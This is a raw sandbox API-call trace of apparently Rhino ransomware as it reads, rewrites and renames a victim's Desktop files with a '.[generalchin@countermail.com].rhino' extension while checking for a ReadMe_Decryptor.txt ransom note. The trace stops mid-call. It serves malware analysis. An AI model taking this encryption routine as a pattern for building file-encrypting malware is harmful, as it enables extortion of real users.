lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CZ823cDl.mp4.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cz823cdl.mp4.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0078.335] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9730 | out: hHeap=0x6d0000) returned 1 [0078.335] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703f80 | out: hHeap=0x6d0000) returned 1 [0078.335] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0078.341] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0078.341] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f69c8 | out: hHeap=0x6d0000) returned 1 [0078.341] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f69c8 [0078.341] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb8f0 [0078.341] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f69c8 | out: hHeap=0x6d0000) returned 1 [0078.341] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0078.341] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb8f0 | out: hHeap=0x6d0000) returned 1 [0078.341] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\diUkv-tq-j.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\diukv-tq-j.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0078.341] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x4af30c | out: lpFileSizeHigh=0x4af30c*=0x0) returned 0x10466 [0078.341] LockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10586, nNumberOfBytesToLockHigh=0x0) returned 1 [0078.341] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.341] ReadFile (in: hFile=0x124, lpBuffer=0x4af2cc, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x4af2cc*, lpNumberOfBytesRead=0x4af2ac*=0x20, lpOverlapped=0x0) returned 1 [0078.342] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.343] ReadFile (in: hFile=0x124, lpBuffer=0x3110040, nNumberOfBytesToRead=0x10466, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x3110040*, lpNumberOfBytesRead=0x4af2ac*=0x10466, lpOverlapped=0x0) returned 1 [0078.343] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5760 [0078.343] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.343] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0078.344] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b00 [0078.344] GetLastError () returned 0x0 [0078.344] SetLastError (dwErrCode=0x0) [0078.344] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0078.344] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x10489) returned 0x744cd8 [0078.347] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0078.348] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x703e78 [0078.348] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x703f80 [0078.348] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0078.348] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.348] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x6f5760 [0078.348] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x6f5750 [0078.348] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.348] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x6f5760 [0078.348] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0078.348] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5750 [0078.348] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.348] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f5760 [0078.348] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0078.348] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x714170 [0078.348] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.348] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x714188 [0078.348] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714170 | out: hHeap=0x6d0000) returned 1 [0078.348] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709f08 [0078.348] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714188 | out: hHeap=0x6d0000) returned 1 [0078.348] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713d48 [0078.349] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0078.349] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x715080 [0078.349] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d48 | out: hHeap=0x6d0000) returned 1 [0078.349] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e6b00 [0078.349] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0078.349] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6f36d0 [0078.349] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0078.349] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x703e78 [0078.349] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0078.349] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x721c20 [0078.349] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0078.349] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x721d00 [0078.349] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0078.349] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x714b90 [0078.349] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721d00 | out: hHeap=0x6d0000) returned 1 [0078.349] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x721c20 [0078.349] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714b90 | out: hHeap=0x6d0000) returned 1 [0078.349] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x6f2da0 [0078.349] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0078.349] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x6f45b8 [0078.349] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f2da0 | out: hHeap=0x6d0000) returned 1 [0078.350] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x6ee498 [0078.350] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f45b8 | out: hHeap=0x6d0000) returned 1 [0078.350] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x6eee00 [0078.350] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0078.350] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x6efc18 [0078.350] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eee00 | out: hHeap=0x6d0000) returned 1 [0078.350] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x715898 [0078.351] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6efc18 | out: hHeap=0x6d0000) returned 1 [0078.351] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x6ee498 [0078.351] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0078.351] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x715898 [0078.351] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0078.351] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x755170 [0078.352] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0078.352] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x75bc50 [0078.353] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x755170 | out: hHeap=0x6d0000) returned 1 [0078.353] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x765c80 [0078.354] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75bc50 | out: hHeap=0x6d0000) returned 1 [0078.354] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x774cb8 [0078.355] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x765c80 | out: hHeap=0x6d0000) returned 1 [0078.355] WriteFile (in: hFile=0x124, lpBuffer=0x774cc0*, nNumberOfBytesToWrite=0x10586, lpNumberOfBytesWritten=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x774cc0*, lpNumberOfBytesWritten=0x4af2ac*=0x10586, lpOverlapped=0x0) returned 1 [0078.356] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x774cb8 | out: hHeap=0x6d0000) returned 1 [0078.356] UnlockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10586, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0078.356] CloseHandle (hObject=0x124) returned 1 [0078.361] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x6fabf0 [0078.362] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x6f36d0 [0078.362] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6fabf0 | out: hHeap=0x6d0000) returned 1 [0078.362] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\diUkv-tq-j.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\diukv-tq-j.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\diUkv-tq-j.swf.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\diukv-tq-j.swf.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0078.364] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0078.364] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703f80 | out: hHeap=0x6d0000) returned 1 [0078.364] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x744cd8 | out: hHeap=0x6d0000) returned 1 [0078.364] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f69c8 [0078.364] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0078.364] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0078.364] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb8f0 [0078.364] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0078.364] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0078.364] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb8f0 | out: hHeap=0x6d0000) returned 1 [0078.364] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\duL9GH_4L.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dul9gh_4l.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0078.364] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x4af30c | out: lpFileSizeHigh=0x4af30c*=0x0) returned 0x1173a [0078.364] LockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1185a, nNumberOfBytesToLockHigh=0x0) returned 1 [0078.364] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.365] ReadFile (in: hFile=0x124, lpBuffer=0x4af2cc, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x4af2cc*, lpNumberOfBytesRead=0x4af2ac*=0x20, lpOverlapped=0x0) returned 1 [0078.366] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.366] ReadFile (in: hFile=0x124, lpBuffer=0x3110040, nNumberOfBytesToRead=0x1173a, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x3110040*, lpNumberOfBytesRead=0x4af2ac*=0x1173a, lpOverlapped=0x0) returned 1 [0078.367] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5760 [0078.367] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.367] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0078.367] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b00 [0078.367] GetLastError () returned 0x0 [0078.367] SetLastError (dwErrCode=0x0) [0078.367] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0078.367] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1175d) returned 0x744cd8 [0078.368] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0078.368] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x703e78 [0078.368] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x703f80 [0078.368] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0078.368] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.368] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x6f5760 [0078.368] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x6f5750 [0078.368] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.368] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x6f5760 [0078.368] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0078.368] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5750 [0078.368] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.368] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f5760 [0078.368] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0078.368] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x714188 [0078.368] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.368] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x714170 [0078.369] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714188 | out: hHeap=0x6d0000) returned 1 [0078.369] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709f08 [0078.378] UnlockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1185a, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0078.378] CloseHandle (hObject=0x124) returned 1 [0078.378] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x6fabf0 [0078.378] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9730 [0078.379] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\duL9GH_4L.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dul9gh_4l.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\duL9GH_4L.jpg.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dul9gh_4l.jpg.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0078.382] LockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x471f, nNumberOfBytesToLockHigh=0x0) returned 1 [0078.382] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.382] ReadFile (in: hFile=0x124, lpBuffer=0x4af2cc, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x4af2cc*, lpNumberOfBytesRead=0x4af2ac*=0x20, lpOverlapped=0x0) returned 1 [0078.383] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.384] ReadFile (in: hFile=0x124, lpBuffer=0x3110040, nNumberOfBytesToRead=0x45ff, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x3110040*, lpNumberOfBytesRead=0x4af2ac*=0x45ff, lpOverlapped=0x0) returned 1 [0078.384] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5760 [0078.384] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.384] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0078.384] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b00 [0078.384] GetLastError () returned 0x0 [0078.384] SetLastError (dwErrCode=0x0) [0078.384] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0078.385] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4622) returned 0x715898 [0078.385] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0078.385] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x703e78 [0078.385] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x703f80 [0078.385] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0078.385] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.385] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x6f5760 [0078.385] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x6f5750 [0078.385] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.385] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x6f5760 [0078.385] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0078.385] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5750 [0078.385] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.385] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f5760 [0078.385] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0078.385] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x714170 [0078.385] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.385] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x714188 [0078.385] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714170 | out: hHeap=0x6d0000) returned 1 [0078.385] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709f08 [0078.386] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714188 | out: hHeap=0x6d0000) returned 1 [0078.386] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713d48 [0078.386] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0078.386] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x715080 [0078.386] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d48 | out: hHeap=0x6d0000) returned 1 [0078.386] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e6b00 [0078.386] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0078.386] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6f36d0 [0078.386] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0078.386] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x703e78 [0078.386] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0078.386] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x721c20 [0078.386] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0078.386] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x721d00 [0078.386] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0078.386] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x714b90 [0078.386] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721d00 | out: hHeap=0x6d0000) returned 1 [0078.386] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x721c20 [0078.386] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714b90 | out: hHeap=0x6d0000) returned 1 [0078.386] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x6f2da0 [0078.386] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0078.386] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x6f45b8 [0078.386] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f2da0 | out: hHeap=0x6d0000) returned 1 [0078.386] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x6ee498 [0078.386] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f45b8 | out: hHeap=0x6d0000) returned 1 [0078.387] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x6eee00 [0078.387] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0078.387] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x6efc18 [0078.387] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eee00 | out: hHeap=0x6d0000) returned 1 [0078.387] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x744cd8 [0078.387] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6efc18 | out: hHeap=0x6d0000) returned 1 [0078.387] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x6ee498 [0078.387] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x744cd8 | out: hHeap=0x6d0000) returned 1 [0078.387] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x744cd8 [0078.387] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0078.387] WriteFile (in: hFile=0x124, 